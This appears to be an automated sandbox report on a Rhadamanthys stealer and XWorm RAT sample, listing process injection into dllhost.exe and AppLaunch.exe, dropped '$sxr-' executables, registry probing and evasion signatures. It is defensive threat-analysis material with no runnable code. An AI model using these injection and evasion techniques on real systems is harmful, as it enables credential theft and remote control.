Malware Analysis Report

2025-05-05 22:24

Sample ID 231010-plsnbsdd7z
Target https://google.com
Tags
rhadamanthys xworm agilenet rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file https://google.com was found to be: Known bad.

Malicious Activity Summary

rhadamanthys xworm agilenet rat stealer trojan

Rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Detect Xworm Payload

Xworm

Detect rhadamanthys stealer shellcode

Obfuscated with Agile.Net obfuscator

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Drops file in Windows directory

Program crash

Enumerates physical storage devices

Kills process with taskkill

Suspicious use of FindShellTrayWindow

Views/modifies file attributes

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Suspicious use of SetWindowsHookEx

Suspicious use of SendNotifyMessage

Uses Task Scheduler COM API

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Checks SCSI registry key(s)

Modifies registry class

Runs ping.exe

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-10 12:25

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-10 12:25

Reported

2023-10-10 12:36

Platform

win10-20230915-en

Max time kernel

635s

Max time network

641s

Command Line

winlogon.exe

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect rhadamanthys stealer shellcode

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Rhadamanthys

stealer rhadamanthys

Xworm

trojan rat xworm

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2445638973-2158012892-84912826-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2445638973-2158012892-84912826-1000\Control Panel\International\Geo\Nation C:\Windows\$sxr-mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2445638973-2158012892-84912826-1000\Control Panel\International\Geo\Nation C:\Windows\$sxr-mshta.exe N/A

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4264 set thread context of 5024 N/A C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe C:\Windows\System32\dllhost.exe
PID 4264 set thread context of 4392 N/A C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 3556 set thread context of 3896 N/A C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe C:\Windows\System32\dllhost.exe
PID 3556 set thread context of 4304 N/A C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 4264 set thread context of 4016 N/A C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe C:\Windows\System32\dllhost.exe
PID 4264 set thread context of 4560 N/A C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 3556 set thread context of 4900 N/A C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe C:\Windows\System32\dllhost.exe
PID 3556 set thread context of 4060 N/A C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe C:\Windows\SysWOW64\dllhost.exe
PID 2276 set thread context of 3676 N/A C:\Users\Admin\Desktop\all-cracked-rats-main\XWorm V5.0\crack.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4544 set thread context of 1796 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3632 set thread context of 3500 N/A C:\Users\Admin\AppData\Local\Temp\Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\rescache\_merged\1601268389\3877292338.pri C:\Windows\system32\taskmgr.exe N/A
File created C:\Windows\rescache\_merged\4183903823\810424605.pri C:\Windows\system32\taskmgr.exe N/A
File opened for modification C:\Windows\$sxr-cmd.exe C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe N/A
File created C:\Windows\$sxr-powershell.exe C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe N/A
File created C:\Windows\rescache\_merged\4183903823\810424605.pri C:\Windows\system32\taskmgr.exe N/A
File opened for modification C:\Windows\$sxr-powershell.exe C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe N/A
File opened for modification C:\Windows\$sxr-powershell.exe C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe N/A
File opened for modification C:\Windows\$sxr-mshta.exe C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe N/A
File created C:\Windows\rescache\_merged\4183903823\810424605.pri C:\Windows\system32\taskmgr.exe N/A
File created C:\Windows\rescache\_merged\1601268389\3877292338.pri C:\Windows\system32\taskmgr.exe N/A
File created C:\Windows\$sxr-cmd.exe C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe N/A
File opened for modification C:\Windows\$sxr-cmd.exe C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe N/A
File created C:\Windows\rescache\_merged\1601268389\3877292338.pri C:\Windows\system32\taskmgr.exe N/A
File created C:\Windows\rescache\_merged\4183903823\810424605.pri C:\Windows\system32\taskmgr.exe N/A
File created C:\Windows\rescache\_merged\1601268389\3877292338.pri C:\Windows\system32\taskmgr.exe N/A
File created C:\Windows\$sxr-powershell.exe C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe N/A
File created C:\Windows\$sxr-mshta.exe C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe N/A
File opened for modification C:\Windows\$sxr-mshta.exe C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe N/A
File created C:\Windows\$sxr-cmd.exe C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe N/A
File created C:\Windows\$sxr-mshta.exe C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133414143416546858" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2445638973-2158012892-84912826-1000_Classes\Local Settings C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance C:\Windows\$sxr-mshta.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance C:\Windows\$sxr-mshta.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\7-Zip\7zG.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
